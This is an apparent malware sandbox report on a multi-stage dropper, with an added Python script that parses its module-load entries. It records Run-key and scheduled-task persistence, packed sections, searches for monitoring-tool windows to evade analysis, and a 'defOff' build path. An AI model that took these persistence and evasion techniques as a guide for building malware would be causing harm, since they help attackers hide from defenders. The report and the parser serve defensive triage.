Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: pnrpnsp.dll
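The module-load listing above records one line per image load, which is why it runs to hundreds of lines; what an analyst wants from it is a per-process view of which capabilities the loaded modules imply and which loads repeat. The Python below is an added example and is not part of the Joe Sandbox report. It parses lines in exactly the "Source: <image> Section loaded: <dll>" form used above (trailing link text such as "Jump to behavior" is ignored); the capability mapping and the treatment of the Winsock namespace-provider chain are my own analyst heuristics, and the sample input is a handful of lines copied from the listing plus one non-matching record.

```python
import re
from collections import Counter, defaultdict

# One record per image load, in the form the report uses; trailing text after the DLL is ignored.
LINE_RE = re.compile(r"^Source:\s+(?P<proc>.+?)\s+Section loaded:\s+(?P<dll>[\w.\-]+)")

# Analyst heuristics (mine, not the report's): what a module load suggests about capability.
CAPABILITY_HINTS = {
    "dnsapi.dll":   "DNS resolution",
    "winhttp.dll":  "HTTP(S) via WinHTTP",
    "wininet.dll":  "HTTP(S) via WinINet",
    "schannel.dll": "TLS (Schannel)",
    "dpapi.dll":    "DPAPI decryption, e.g. browser or credential secrets",
    "rstrtmgr.dll": "Restart Manager, often used to release locks on in-use files",
    "mscoree.dll":  ".NET runtime hosted",
    "wbemcomn.dll": "WMI client",
    "amsi.dll":     "AMSI initialised",
    "netapi32.dll": "NetAPI workstation/domain queries",
}
# Winsock namespace providers: loaded as a chain whenever a fresh name-resolution session starts.
NSP_CHAIN = {"napinsp.dll", "pnrpnsp.dll", "wshbth.dll", "nlaapi.dll", "winrnr.dll"}

# Constructed input: a handful of lines copied from the listing above, plus one unrelated record.
SAMPLE_LINES = r"""
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: Window Recorder Window detected: More than 3 window changes detected
"""


def parse_section_loaded(lines):
    """Map each process image path to a Counter of the modules it loaded (case-folded)."""
    loads = defaultdict(Counter)
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:                                   # other report records are skipped
            loads[m["proc"]][m["dll"].lower()] += 1
    return loads


def summarize(lines):
    """Per-process triage view: distinct modules, repeated loads, lookup rounds, capability hints."""
    out = {}
    for proc, mods in parse_section_loaded(lines).items():
        image = proc.rsplit("\\", 1)[-1]
        out[image] = {
            "path": proc,
            "distinct": len(mods),
            "repeat_loads": {d: c for d, c in sorted(mods.items()) if c > 1},
            # How often the NSP chain was (re)loaded: a rough proxy for separate resolution rounds.
            "resolution_rounds": max((mods[d] for d in NSP_CHAIN if d in mods), default=0),
            "hints": [f"{CAPABILITY_HINTS[d]} ({d})" for d in sorted(mods) if d in CAPABILITY_HINTS],
        }
    return out


if __name__ == "__main__":
    for image, info in summarize(SAMPLE_LINES.splitlines()).items():
        print(image, info["distinct"], info["resolution_rounds"], info["repeat_loads"])
        for hint in info["hints"]:
            print("   ", hint)
```

The long napinsp.dll / pnrpnsp.dll / wshbth.dll / nlaapi.dll / winrnr.dll runs in the 2ada66c192.exe entries above are the Winsock namespace-provider chain being initialised again and again, which is consistent with a process performing many separate name lookups (repeated C2 resolution attempts, for instance). The count is a rough proxy for lookup rounds, not an exact one, so treat it as a triage signal rather than a measurement.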
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: file.exe Static file information: File size 3210240 > 1048576
Source: file.exe Static PE information: Raw size of nnwaoodm is bigger than: 0x100000 < 0x2a4000
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 9c2827fca4.exe, 0000001C.00000003.2709881052.0000000004770000.00000004.00001000.00020000.00000000.sdmp, 9c2827fca4.exe, 0000001C.00000002.2843648513.0000000000672000.00000040.00000001.01000000.00000012.sdmp, 9c2827fca4.exe, 00000021.00000003.2837715853.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, 9c2827fca4.exe, 00000021.00000002.2878103010.0000000000672000.00000040.00000001.01000000.00000012.sdmp

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.9e0000.0.unpack :EW;.rsrc:W;.idata :W;nnwaoodm:EW;ocwkoyql:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;nnwaoodm:EW;ocwkoyql:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 1.2.skotes.exe.aa0000.0.unpack :EW;.rsrc:W;.idata :W;nnwaoodm:EW;ocwkoyql:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;nnwaoodm:EW;ocwkoyql:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 2.2.skotes.exe.aa0000.0.unpack :EW;.rsrc:W;.idata :W;nnwaoodm:EW;ocwkoyql:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;nnwaoodm:EW;ocwkoyql:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 6.2.skotes.exe.aa0000.0.unpack :EW;.rsrc:W;.idata :W;nnwaoodm:EW;ocwkoyql:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;nnwaoodm:EW;ocwkoyql:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Unpacked PE file: 9.2.37df924488.exe.680000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ipnqzgkg:EW;equqovlh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ipnqzgkg:EW;equqovlh:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Unpacked PE file: 10.2.ae5cfd188c.exe.2a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xyjapqsh:EW;fjnsenoe:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;xyjapqsh:EW;fjnsenoe:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Unpacked PE file: 27.2.37df924488.exe.680000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ipnqzgkg:EW;equqovlh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ipnqzgkg:EW;equqovlh:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Unpacked PE file: 28.2.9c2827fca4.exe.670000.0.unpack :EW;.rsrc:W;.idata :W;cdtvwakf:EW;qjmihuav:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Unpacked PE file: 33.2.9c2827fca4.exe.670000.0.unpack :EW;.rsrc:W;.idata :W;cdtvwakf:EW;qjmihuav:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006742DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 11_2_006742DE
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: random[1].exe.6.dr Static PE information: real checksum: 0x1de5a6 should be: 0x1de476
Source: ae5cfd188c.exe.6.dr Static PE information: real checksum: 0x1de5a6 should be: 0x1de476
Source: random[1].exe2.6.dr Static PE information: real checksum: 0x2cb988 should be: 0x2ccccb
Source: 37df924488.exe.6.dr Static PE information: real checksum: 0x1bd78b should be: 0x1bf97a
Source: file.exe Static PE information: real checksum: 0x31c073 should be: 0x31a034
Source: skotes.exe.0.dr Static PE information: real checksum: 0x31c073 should be: 0x31a034
Source: random[1].exe0.6.dr Static PE information: real checksum: 0x1bd78b should be: 0x1bf97a
Source: 9c2827fca4.exe.6.dr Static PE information: real checksum: 0x2cb988 should be: 0x2ccccb
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name: nnwaoodm
Source: file.exe Static PE information: section name: ocwkoyql
Source: file.exe Static PE information: section name: .taggant
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name: nnwaoodm
Source: skotes.exe.0.dr Static PE information: section name: ocwkoyql
Source: skotes.exe.0.dr Static PE information: section name: .taggant
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: .idata
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: xyjapqsh
Source: random[1].exe.6.dr Static PE information: section name: fjnsenoe
Source: random[1].exe.6.dr Static PE information: section name: .taggant
Source: ae5cfd188c.exe.6.dr Static PE information: section name:
Source: ae5cfd188c.exe.6.dr Static PE information: section name: .idata
Source: ae5cfd188c.exe.6.dr Static PE information: section name:
Source: ae5cfd188c.exe.6.dr Static PE information: section name: xyjapqsh
Source: ae5cfd188c.exe.6.dr Static PE information: section name: fjnsenoe
Source: ae5cfd188c.exe.6.dr Static PE information: section name: .taggant
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: .idata
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: ipnqzgkg
Source: random[1].exe0.6.dr Static PE information: section name: equqovlh
Source: random[1].exe0.6.dr Static PE information: section name: .taggant
Source: 37df924488.exe.6.dr Static PE information: section name:
Source: 37df924488.exe.6.dr Static PE information: section name: .idata
Source: 37df924488.exe.6.dr Static PE information: section name:
Source: 37df924488.exe.6.dr Static PE information: section name: ipnqzgkg
Source: 37df924488.exe.6.dr Static PE information: section name: equqovlh
Source: 37df924488.exe.6.dr Static PE information: section name: .taggant
Source: random[1].exe2.6.dr Static PE information: section name:
Source: random[1].exe2.6.dr Static PE information: section name: .idata
Source: random[1].exe2.6.dr Static PE information: section name: cdtvwakf
Source: random[1].exe2.6.dr Static PE information: section name: qjmihuav
Source: random[1].exe2.6.dr Static PE information: section name: .taggant
Source: 9c2827fca4.exe.6.dr Static PE information: section name:
Source: 9c2827fca4.exe.6.dr Static PE information: section name: .idata
Source: 9c2827fca4.exe.6.dr Static PE information: section name: cdtvwakf
Source: 9c2827fca4.exe.6.dr Static PE information: section name: qjmihuav
Source: 9c2827fca4.exe.6.dr Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009FD91C push ecx; ret 0_2_009FD92F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009F1359 push es; ret 0_2_009F135A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_00ABD91C push ecx; ret 1_2_00ABD92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_00ABD91C push ecx; ret 2_2_00ABD92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00ABD91C push ecx; ret 6_2_00ABD92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00ADDEDB push ss; iretd 6_2_00ADDEDC
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00ABDFC6 push ecx; ret 6_2_00ABDFD9
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_00690A76 push ecx; ret 11_2_00690A89
Source: file.exe Static PE information: section name: entropy: 7.067745136702224
Source: skotes.exe.0.dr Static PE information: section name: entropy: 7.067745136702224
Source: random[1].exe.6.dr Static PE information: section name: entropy: 7.97823310420282
Source: random[1].exe.6.dr Static PE information: section name: xyjapqsh entropy: 7.953197683807969
Source: ae5cfd188c.exe.6.dr Static PE information: section name: entropy: 7.97823310420282
Source: ae5cfd188c.exe.6.dr Static PE information: section name: xyjapqsh entropy: 7.953197683807969
Source: random[1].exe0.6.dr Static PE information: section name: ipnqzgkg entropy: 7.954190185075461
Source: 37df924488.exe.6.dr Static PE information: section name: ipnqzgkg entropy: 7.954190185075461
Source: random[1].exe2.6.dr Static PE information: section name: entropy: 7.79776762494654
Source: 9c2827fca4.exe.6.dr Static PE information: section name: entropy: 7.79776762494654
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9c2827fca4.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2ada66c192.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ae5cfd188c.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 37df924488.exe
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\skotes.job
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ae5cfd188c.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ae5cfd188c.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 37df924488.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 37df924488.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2ada66c192.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2ada66c192.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9c2827fca4.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9c2827fca4.exe
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_0068F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 11_2_0068F98E
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_00701C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 11_2_00701C41
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
